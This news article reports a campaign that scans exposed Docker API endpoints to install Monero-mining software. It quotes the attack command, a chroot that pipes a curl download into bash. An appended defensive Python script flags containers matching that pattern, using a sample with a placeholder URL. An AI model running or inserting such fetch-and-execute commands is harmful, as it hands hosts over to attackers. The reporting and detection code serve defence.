Unknown hackers have launched a new campaign that’s actively scanning for vulnerable Docker application container instances to inject cryptomining code.
Discovered by cybersecurity firm Bad Packets LLC, the group is actively scanning for vulnerable Docker instances that have application programming interface endpoints exposed to the internet.
Although efforts by hackers to find and hijack servers are common, this case is specifically notable because of the volume: Those behind it are scanning more than 59,000 IP networks in an attempt to identify vulnerable instances.
“What set this campaign apart was the large uptick of scanning activity,” Troy Mursch, chief research officer and co-founder of Bad Packets, told ZDNet Tuesday. “This alone warranted further investigation to find out what this botnet was up to. This isn’t your average script kiddie exploit attempt. There was a moderate level of effort put into this campaign, and we haven’t fully analyzed every single thing it does as of yet.”
Once a vulnerable Docker instance is located, a command is run that installs the XMRig mining software, which hijacks the server's processing power to mine the Monero cryptocurrency.
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'", #threatintel pic.twitter.com/vxszV5SF1o
— Bad Packets Report (@bad_packets) November 25, 2019
Monero has long been the favorite cryptocurrency of hackers. Unlike bitcoin and other cryptocurrencies that use a public blockchain, thus making transactions traceable, Monero is private and difficult if not impossible to trace.
This isn’t the first time Docker has been targeted by those attempting to install cryptomining code. In March, unpatched Docker hosts were targeted through a runC vulnerability, with access also gained via Docker’s remote API being left open to the public, and Monero mining software was installed.
And last month, a cryptojacking worm dubbed “Graboid” was spotted in the wild after spreading to more than 2,000 unsecured Docker hosts. If this sounds repetitive, it should: the hackers exploited Docker vulnerabilities to install Monero cryptomining code.
In this new campaign, as of Tuesday the attackers may have been actively scanning but had yet to profit much. Mursch estimates that they have managed to mine only 14.82 Monero (XMR), worth about $832.
Users running Docker instances are advised to check whether they are exposing their API endpoints and, if so, to close the ports and terminate any unrecognized running containers.
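The second half of that advice, spotting a container that matches the pattern in the tweet above (an Alpine image with the host filesystem bind-mounted and a chroot that pipes a download into a shell), can be automated over `docker inspect` output. The script below is an added example, not code from Bad Packets or the Docker project; the embedded sample data is constructed, and the URL in it is a placeholder rather than the campaign's real one.

```python
import json
import sys

# Constructed sample of `docker inspect` output (not real campaign data): one
# ordinary container and one matching the pattern quoted in the tweet above.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web",
     "Config": {"Image": "nginx:1.17", "Cmd": ["nginx", "-g", "daemon off;"]},
     "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
    {"Name": "/elegant_bob",
     "Config": {"Image": "alpine:latest",
                "Cmd": ["chroot", "/mnt", "/bin/sh", "-c",
                        "curl -sL4 https://example.invalid/x | bash;"]},
     "HostConfig": {"Binds": ["/:/mnt"]}},
])

def host_root_binds(container):
    """Bind mounts whose host side is '/', i.e. the whole host filesystem."""
    binds = container.get("HostConfig", {}).get("Binds") or []
    return [b for b in binds if b.split(":", 1)[0] == "/"]

def pipes_download_to_shell(cmd):
    """True when the command chroots somewhere and pipes a download into a shell."""
    joined = " ".join(cmd or [])
    fetches = any(tool in joined for tool in ("curl ", "wget "))
    to_shell = any(s in joined for s in ("| bash", "| sh", "|bash", "|sh"))
    return "chroot" in joined and fetches and to_shell

def suspicious_containers(inspect_json):
    """Return (name, reasons) for each container matching the campaign's pattern."""
    findings = []
    for c in json.loads(inspect_json):
        reasons = []
        roots = host_root_binds(c)
        if roots:
            reasons.append("host root bind-mounted: " + ", ".join(roots))
        if pipes_download_to_shell(c.get("Config", {}).get("Cmd")):
            reasons.append("chroot plus download piped into a shell")
        if reasons:
            findings.append((c["Name"], reasons))
    return findings

if __name__ == "__main__":
    # Real use: docker inspect $(docker ps -q) | python3 this_script.py
    data = "" if sys.stdin.isatty() else sys.stdin.read()
    for name, reasons in suspicious_containers(data or SAMPLE_INSPECT):
        print(name, "->", "; ".join(reasons))
```

Run with no input it reports the constructed sample; flagged containers are candidates for `docker stop`, and the host itself should still be checked for a daemon listening on a non-loopback address.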